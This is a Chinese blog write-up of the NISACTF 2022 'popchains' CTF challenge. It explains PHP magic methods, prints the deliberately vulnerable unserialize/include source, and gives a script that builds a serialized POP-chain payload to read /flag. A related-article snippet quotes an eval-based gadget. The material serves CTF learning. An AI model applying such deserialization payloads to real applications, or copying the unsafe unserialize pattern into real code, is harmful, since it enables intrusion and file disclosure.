反序列化(二)

已于 2023-08-31 21:14:29 修改
阅读量45 收藏
点赞数
分类专栏: # 反序列化 文章标签: 网络安全
于 2023-08-31 21:13:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43520778/article/details/132611307
版权

@[toc]@反序列化

[NISACTF 2022]popchains

提示:
__construct()创建对象时调用
__destruct()销毁对象时调用
__toString()把对象转换为字符串,打印一个对象时被调用
__sleep()在序列化前被调用,此功能可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组
__wakeup()将在序列化之后立即被调用
__invoke()魔术⽅法是方法对象被当做函数方法进⾏调⽤的时候所触发
__call()当要调用的方法不存在或权限不足时,会自动调用__call 方法
__get()读取不可访问或者不存在的属性的时候,进行赋值
__set()方法的作用是为私有成员属性设置值,它含有两个参数,第一个参数是要赋值的属性名,第二个参数是要給属性赋的值,没有返回值,这个方法同样不用手动调用,实在设置私有属性值得时候自动调用的

题目源码

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

解题思路

提示:include()文件包含命令
#include叫做“文件包含命令”,用来引入对应的头文件(.h文件) 简单的理解:就是将头文件的内容插入到该命令的所在位置, 从而把头文件的内容和当前的源文件连接成一个源文件。 既:复制-粘贴。

根据include倒推,分析执行顺序,构建pop链条

append->__invoke->__get->__construct($this->page = $file;)->__toString->__wakeup

构造pop链

提示:preg_match(),使用url编码绕过

Happy New Year~ MAKE A WISH
<?php

class Road_is_Long{
    public $page;
    public $string;

}

class Try_Work_Hard{
    protected  $var="/flag";

}

class Make_a_Change{
    public $effort;
}

$a = new Road_is_Long();
$b = new Try_Work_Hard();
$c = new Make_a_Change();

$a->page = $a;
$a->string = $c;
$c->effort = $b;

echo urlencode(serialize($a));

?>

提示:因为var是protectedprotected(受保护)类,允许被其自身以及其子类和父类访问,但不允许对其修改,故pop链调用Try_Work_Hard()为终止,通过__invoke()执行append函数方法执行include()命令调用var的值

L'amour d'une vie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
序列化,反序列化技术,__sleep __wakeup __tostring __invoke()
qq_37171379的博客
02-12 1151
含义: 序列化: 就是将一个变量所代表的“内存”数据,转换为“字符串”形式并持久保存在硬盘上的一种做法。 反序列化: 就是将序列化之后保存在硬盘上的“字符串数据”,恢复为其原来的内存形式的变量数据的一种做法。 序列化的做法: $v1 = 123; //这是一个变量,代表任意的内存数据 $s1 = serialize( $v1 ); //将任何类型的变量数据,转换为“字符串” file_put...
反序列化) (略详细)
qq975353472的博客
11-13 475
反序列化) (略详细) 前文讲了讲__wakeup绕过,注入对象构造方法,和session反序列化。 链接为: https://blog.csdn.net/qq975353472/article/details/109657666 这里就讲讲剩下的两种,一个是phar反序列化(推荐先去学习phar用法),和pop链构造(重点哦) 一、Phar反序列化(个人感觉漏洞类型是文件包含+文件上传) 影响函数 fileatime / filectime / filemtime stat / fileinode /
PHP#魔术方法全解
马丁路德彬
02-27 373
简介__construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone() 和 __debugInfo() 等方法在 PHP 中被称为”
php反序列化漏洞中当不存在__invoke时的一种利用思路
qq_51341898的博客
01-14 2368
存在这样两个类,找不到可以利用的__invoke时,如何获得shell class a{ public $code; public function __destruct() { $test=$this->code; $test(); } } class b{ public $code; public function getshell(){ eval($this->code); } }
invoke方法_PHP魔术方法
weixin_39851977的博客
11-27 176
做下记录,温故而知新。构造函数和析构函数__construct 构造函数类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。__deconstruct析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。<?php class MyDestructableClass { public $name; function __construc...
[Web/基础/反序列化]反序列化轻量总结
車鈊的博客
10-12 400
文章目录反序列化序列化和反序列化序列化是什么?魔术方法三种类型的变量的表示方法(public,protected,private)基本反序列化破坏__Wakeup失效反序列化写链其他形式反序列化SESSION反序列化Session原理其反序列化字符逃逸Python反序列化`Phar`反序列化什么是`Phar`文件?`Phar`结构那么思路是什么呢?一些限制框架反序列化 反序列化 序列化和反序列化 序列化是什么? 我们在运行程序时变量是存在于内存当中的,为了保存他们,我们可以将其转化为有确定格式的、可传输、可
反序列化(一) (略详细)
qq975353472的博客
11-13 521
反序列化 本文所涉及的序列化类型 __wakeup()绕过 注入对象构造方法 session反序列化 phar反序列化 pop链构造 一、序列化和反序列化 维基百科中这样定义:序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。 概念很容易理解,其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 先看个例子 1、 根据目标构造对
c#序列化和反序列化
05-24
#### 反序列化概述 反序列化是将序列化后的数据恢复成对象的过程。它允许我们在读取存储的数据或接收远程传输的数据之后,能够重新构建原始对象的状态。 **为什么需要反序列化?** - **恢复对象状态**:在数据...
java序列化和反序列化,面试必备
12-21
Java序列化和反序列化是Java开发中常见且重要的概念,尤其在面试中常常被问及。序列化是指将一个Java对象转化为字节序列的过程,这样可以将对象的状态持久化到磁盘上或者在网络中进行传输。反序列化则是相反的过程,...
Java中对象序列化与反序列化详解
09-03
这个过程被称为序列化,而将字节序列恢复为原来的对象则称为反序列化。本文将深入探讨Java中的对象序列化与反序列化的概念、原理、实现方法以及相关的注意事项。 **一、对象序列化的概念和作用** 对象序列化是将一...
Cereal序列化反序列化
07-07
Cereal支持将对象序列化为JSON、XML和进制格式,并提供了灵活的API来自定义序列化和反序列化过程。它可以序列化基本数据类型、STL容器、自定义类和结构体等。不需要安装,只需把hpp文件包含在项目即可。
C#序列化与反序列化(包括复杂xml对象)
07-01
方法反序列化取节点标签值 当XML节点包含实际的值而不是键值对时,我们需要获取这些节点的标签值。这可以通过在C#类中定义对应的属性,并使用`XmlElement`特性来指定其对应的XML元素。`XmlSerializer`会自动将...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
聚类算法-一种无监督学习方法.docx
08-12
聚类算法是一种无监督学习方法,用于将数据集中的数据点自动分组到不同的类别中,这些类别也称为“簇”或“群”。聚类的目标是让同一簇内的数据点尽可能相似,而不同簇之间的数据点尽可能不相似。聚类算法广泛应用于多种领域,如数据挖掘、模式识别、图像分析、信息检索等。 聚类算法的基本概念 无监督学习:聚类算法不需要事先标记数据点的类别标签,而是根据数据本身的相似性来分组。 相似性度量:聚类算法依赖于某种相似性或距离度量来决定数据点之间的相似程度。常用的度量包括欧氏距离、曼哈顿距离等。 目标函数:大多数聚类算法都会尝试最小化某种目标函数,例如簇内的平方误差和(SSE)。 常见的聚类算法 K-Means K-Means 是一种原型聚类算法,它通过迭代地将数据点分配到最近的质心来形成簇,并重新计算每个簇的质心,直到质心不再显著变化为止。 在 Python 的 scikit-learn 库中,可以通过 KMeans 类实现 K-Means 聚类。 层次聚类 层次聚类构建一个树状图(称为树状图或 dendrogram),显示数据点是如何逐渐合并成簇的。 这种算法可以是凝聚型(自底向上)或分裂型(自顶向下)。
45ft集装箱模型3D图纸 STEP格式.zip
08-12
45ft集装箱模型3D图纸 STEP格式.zip
Spring Boot网吧管理系统.zip
08-12
该系统严格按照需求分析制作相关模块,并利用所学知识尽力完成,但是本人由于学识浅薄,无法真正做到让该程序可以投入市场使用,仅仅简单实现部分功能,希望日后还能改善。 本系统具有以下优点: 该系统具有较高的适用性,选用B/S结构,可以在绝大部分个人平台上使用该系统。 系统将用户权限进行划分,管理员,网管和会员都能看到及操作的信息不一样,三者具备不同的操作权限。 该系统操作界面简单明了,大部分人都可以正常使用。 但也存在以下问题需要改进: 运行时窗口不能被刷新,可以改进。 系统过于简单,显示的信息有限。。 不能添加多个管理员账号,如果可以则将利于发展网吧规模,便于网吧信息集中管理。 不能实时预约接待消息和网吧反馈建议,容易被忽视,不利于管理员服务客户。
微信小程序大作业 新闻小程序
08-12
微信小程序大作业 新闻小程序
一种简单易用的通用循环队列的C语言解决方案
08-12
博文《一种简单易用的通用循环队列的C语言解决方案》实现的代码。 在实际的嵌入式编程中,消息队列的使用还是比较频繁的,已经在文章《一种简单安全的消息队列的C语言解决方案》中说明了一种队列的解决方案,但是那种设计其中还是存在一些不方便的用法,对于嵌入式系统中一些要求或者性能限制下,可能会用到循环队列,但是对于不使用操作系统的情况下,队列相关的功能就需要手动实现。所以下面将会介绍一种简单的循环队列的实现方式。
智慧城市应急指挥中心系统平台建设方案PPT(41页).pptx
最新发布
08-12
城市应急指挥系统是智慧城市建设的重要组成部分,旨在提高城市对突发事件的预防和处置能力。系统背景源于自然灾害和事故灾难频发,如汶川地震和日本大地震等,这些事件造成了巨大的人员伤亡和财产损失。随着城市化进程的加快,应急信息化建设面临信息资源分散、管理标准不统一等问题,需要通过统筹管理和技术创新来解决。 系统的设计思路是通过先进的技术手段,如物联网、射频识别、卫星定位等,构建一个具有强大信息感知和通信能力的网络和平台。这将促进不同部门和层次之间的信息共享、交流和整合,提高城市资源的利用效率,满足城市对各种信息的获取和使用需求。在“十五”期间,应急信息化工作将依托这些技术,实现动态监控、风险管理、预警以及统一指挥调度。 应急指挥系统的建设目标是实现快速有效的应对各种突发事件,保障人民生命财产安全,减少社会危害和经济损失。系统将包括预测预警、模拟演练、辅助决策、态势分析等功能,以及应急值守、预案管理、GIS应用等基本应用。此外,还包括支撑平台的建设,如接警中心、视频会议、统一通信等基础设施。 系统的实施将涉及到应急网络建设、应急指挥、视频监控、卫星通信等多个方面。通过高度集成的系统,建立统一的信息接收和处理平台,实现多渠道接入和融合指挥调度。此外,还包括应急指挥中心基础平台建设、固定和移动应急指挥通信系统建设,以及应急队伍建设,确保能够迅速响应并有效处置各类突发事件。 项目的意义在于,它不仅是提升灾害监测预报水平和预警能力的重要科技支撑,也是实现预防和减轻重大灾害和事故损失的关键。通过实施城市应急指挥系统,可以加强社会管理和公共服务,构建和谐社会,为打造平安城市提供坚实的基础。
Java对象序列化与反序列化详解
对象序列化是将Java对象转换为可存储或可传输的进制字节流的过程,而反序列化则是将这些字节流还原为原来的Java对象。这一过程在数据持久化、网络通信等方面有着广泛的应用。 1. 对象序列化与反序列化的基本概念...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值